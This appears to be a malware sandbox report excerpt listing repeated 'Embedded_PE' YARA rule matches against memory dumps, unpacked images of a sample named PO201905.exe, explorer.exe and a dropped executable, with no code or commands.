Source: 00000006.00000000.4496065227.00960000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000000.00000001.3460208049.00FB0000.00000002.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4489653245.050E0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4482163480.00340000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4499198783.03230000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4495408457.00340000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4485235319.02E50000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4495818939.00720000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4483709645.020D0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4482523631.00720000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000000.00000003.4508449289.00256000.00000004.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4499267957.03330000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4496687348.01D70000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4485229761.02E40000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4485325684.03030000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4496894367.020E0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4499078335.03090000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4497202502.021F0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4495256653.00120000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4496097002.009B0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0000000C.00000002.4700605804.000F0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4483572029.01D70000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000000.00000002.4518214232.0025C000.00000004.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4499056992.03030000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4485467608.03330000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4482532068.00730000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4485342639.03090000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4489179656.04B70000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000000.00000002.4518110322.00210000.00000040.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4497183880.021E0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4489291554.04D40000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000002.00000002.4480303987.004B0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4483716872.020E0000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4482412222.00680000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4495735054.00680000.00000008.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4499297653.033B0000.00000002.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4492371223.086E0000.00000002.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000000.00000003.4481262828.00CA0000.00000004.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000000.00000002.4520262603.026A1000.00000040.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4485576438.033B0000.00000002.sdmp, type: MEMORY	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe, type: DROPPED	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exe, type: DROPPED	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.1c90000.46.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0.2.PO201905.exe.fb0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.5460000.36.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.340000.2.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.4d40000.28.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.2e50000.54.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.2f00000.17.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.1c90000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.5280000.33.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.720000.4.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.d0000.38.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.3230000.22.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.960000.6.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.3230000.60.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.4b80000.26.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.1f30000.10.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.960000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.1d70000.47.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.2e50000.54.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.2.9rxlgd1bcduf.exe.f0000.1.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0.2.PO201905.exe.200000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.0.9rxlgd1bcduf.exe.1060000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.4fd0000.29.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0.0.PO201905.exe.fb0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.2.9rxlgd1bcduf.exe.f0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.20e0000.50.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.4fe0000.30.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.2.9rxlgd1bcduf.exe.e0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.4fe0000.30.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0.2.PO201905.exe.210000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.51e0000.32.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.2e50000.16.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.1.9rxlgd1bcduf.exe.1060000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.21f0000.52.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.3160000.21.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.21f0000.52.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.2fd0000.56.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.d0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.1d70000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.2e40000.15.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.3090000.20.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.2f00000.17.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0.1.PO201905.exe.fb0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.720000.42.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.120000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.3030000.19.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.2f00000.55.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.2e40000.53.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.20d0000.11.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.21e0000.13.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.21e0000.13.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.730000.43.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.d0000.0.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.2fd0000.56.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.340000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.21f0000.14.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.720000.42.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.53a0000.34.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.3090000.20.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.2fd0000.18.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0.2.PO201905.exe.f0000.0.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.4b70000.25.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.3230000.22.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.340000.40.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.5460000.36.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.2e40000.53.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.2e40000.15.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.53e0000.35.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 12.2.9rxlgd1bcduf.exe.e0000.0.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.730000.43.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.3330000.23.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.720000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.d0000.38.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.1f30000.48.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.3090000.58.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0.1.PO201905.exe.fb0000.0.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.21f0000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.53e0000.35.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.120000.1.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.340000.40.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.2fd0000.18.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.120000.39.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0.2.PO201905.exe.f0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.20e0000.12.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.3090000.58.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.4fd0000.29.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0.2.PO201905.exe.200000.1.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.3030000.19.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.1c90000.46.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.4c00000.27.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 6.0.explorer.exe.730000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
